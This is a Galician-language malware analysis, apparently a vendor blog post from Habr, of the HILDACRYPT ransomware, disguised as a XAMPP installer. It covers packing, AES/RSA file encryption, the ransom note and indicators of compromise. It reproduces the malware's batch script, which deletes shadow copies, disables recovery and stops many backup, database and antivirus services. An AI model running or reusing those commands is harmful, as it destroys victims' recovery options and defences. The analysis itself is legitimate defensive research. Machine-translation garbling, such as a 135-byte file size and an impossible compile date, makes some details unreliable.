Ola, Habr! Unha vez máis, estamos a falar das últimas versións de malware da categoría Ransomware. HILDACRYPT é un novo ransomware, un membro da familia Hilda descuberto en agosto de 2019, que recibe o nome do debuxo animado de Netflix que se utilizou para distribuír o software. Hoxe imos familiarizarnos coas características técnicas deste virus ransomware actualizado.
Na primeira versión do ransomware Hilda, unha ligazón a un publicado en Youtube serie de debuxos animados figuraba na carta de rescate. HILDACRYPT se fai pasar por un instalador lexítimo de XAMPP, unha distribución Apache fácil de instalar que inclúe MariaDB, PHP e Perl. Ao mesmo tempo, o cryptolocker ten un nome de ficheiro diferente: xamp. Ademais, o ficheiro de ransomware non ten sinatura electrónica.
Análise estática
O ransomware está contido nun ficheiro PE32 .NET escrito para MS Windows. O seu tamaño é de 135 bytes. Tanto o código do programa principal como o do programa defensor están escritos en C#. Segundo a data de compilación e o selo de hora, o binario creouse o 168 de setembro de 14.
Segundo Detect It Easy, o ransomware arquivase usando Confuser e ConfuserEx, pero estes ofuscadores son os mesmos que antes, só ConfuserEx é o sucesor de Confuser, polo que as súas sinaturas de código son similares.
HILDACRYPT está realmente empaquetado con ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vector de ataque
O máis probable é que o ransomware fose descuberto nun dos sitios de programación web, disfrazado de programa XAMPP lexítimo.
Pódese ver toda a cadea de infección .
Ofuscación
As cadeas de ransomware almacénanse en forma cifrada. Cando se inicia, HILDACRYPT decífraos usando Base64 e AES-256-CBC.
Instalación
Primeiro de todo, o ransomware crea un cartafol en %AppDataRoaming% no que se xera aleatoriamente o parámetro GUID (Globally Unique Identifier). Ao engadir un ficheiro bat a esta localización, o virus ransomware lánzao usando cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat e saír
Despois comeza a executar un script por lotes para desactivar as funcións ou servizos do sistema.
O script contén unha longa lista de comandos que destrúen as instantáneas, desactivan o servidor SQL, copias de seguridade e solucións antivirus.
Por exemplo, tenta deter os servizos de Acronis Backup sen éxito. Ademais, ataca sistemas de copia de seguridade e solucións antivirus dos seguintes provedores: Veeam, Sophos, Kaspersky, McAfee e outros.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Unha vez que os servizos e procesos mencionados anteriormente están desactivados, o cryptolocker recolle información sobre todos os procesos en execución usando o comando tasklist para garantir que todos os servizos necesarios están desactivados.
lista de tarefas v/fo csv
Este comando mostra unha lista detallada dos procesos en execución, cuxos elementos están separados polo signo ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Despois desta comprobación, o ransomware comeza o proceso de cifrado.
Cifrado
Cifrado de ficheiros
HILDACRYPT percorre todos os contidos atopados dos discos duros, excepto os cartafoles Recycle.Bin e Reference Assemblys de Microsoft. Este último contén ficheiros dll, pdb, etc. críticos para aplicacións .Net que poden afectar o funcionamento do ransomware. Para buscar ficheiros que se cifrarán, utilízase a seguinte lista de extensións:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
O ransomware usa o algoritmo AES-256-CBC para cifrar os ficheiros dos usuarios. O tamaño da clave é de 256 bits e o tamaño do vector de inicialización (IV) é de 16 bytes.
Na seguinte captura de pantalla, os valores de byte_2 e byte_1 obtivéronse aleatoriamente usando GetBytes().
Clave
EN E
O ficheiro cifrado ten a extensión HCY!.. Este é un exemplo de ficheiro cifrado. A clave e o IV mencionados anteriormente creáronse para este ficheiro.
Cifrado de chave
O cryptolocker almacena a clave AES xerada nun ficheiro cifrado. A primeira parte do ficheiro cifrado ten unha cabeceira que contén datos como HILDACRYPT, KEY, IV, FileLen en formato XML e ten o seguinte aspecto:
O cifrado de chaves AES e IV realízase mediante RSA-2048 e a codificación realízase mediante Base64. A clave pública RSA gárdase no corpo do cryptolocker nunha das cadeas cifradas en formato XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Utilízase unha clave pública RSA para cifrar a clave do ficheiro AES. A clave pública RSA está codificada en Base64 e consta dun módulo e un expoñente público de 65537. O descifrado require a clave privada RSA, que ten o atacante.
Despois do cifrado RSA, a clave AES codificase mediante Base64 almacenada no ficheiro cifrado.
Mensaxe de rescate
Unha vez completado o cifrado, HILDACRYPT escribe o ficheiro html no cartafol no que cifraba os ficheiros. A notificación de ransomware contén dous enderezos de correo electrónico onde a vítima pode contactar co atacante.
O aviso de extorsión tamén contén a liña "Ningún loli é seguro;)", unha referencia a personaxes de anime e manga con aspecto de nenas prohibidas en Xapón.
Saída
HILDACRYPT, unha nova familia de ransomware, lanzou unha nova versión. O modelo de cifrado impide que a vítima descifra os ficheiros cifrados polo ransomware. Cryptolocker usa métodos de protección activos para desactivar os servizos de protección relacionados con sistemas de copia de seguridade e solucións antivirus. O autor de HILDACRYPT é un fan da serie animada Hilda mostrada en Netflix, cuxa ligazón ao tráiler figuraba na carta de compra da versión anterior do programa.
Como de costume, и pode protexer o seu ordenador contra o ransomware HILDACRYPT e os provedores teñen a capacidade de protexer aos seus clientes con . A protección está garantida polo feito de que estas solucións inclúen inclúe non só a copia de seguridade, senón tamén o noso sistema de seguridade integrado - Impulsado por un modelo de aprendizaxe automática e baseado en heurísticas de comportamento, unha tecnoloxía que é capaz de contrarrestar a ameaza do ransomware zero-day como ningunha outra.
Indicadores de compromiso
Extensión de ficheiro HCY!
HILDACRYPTReadMe.html
xamp.exe cunha letra "p" e sen sinatura dixital
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Fonte: www.habr.com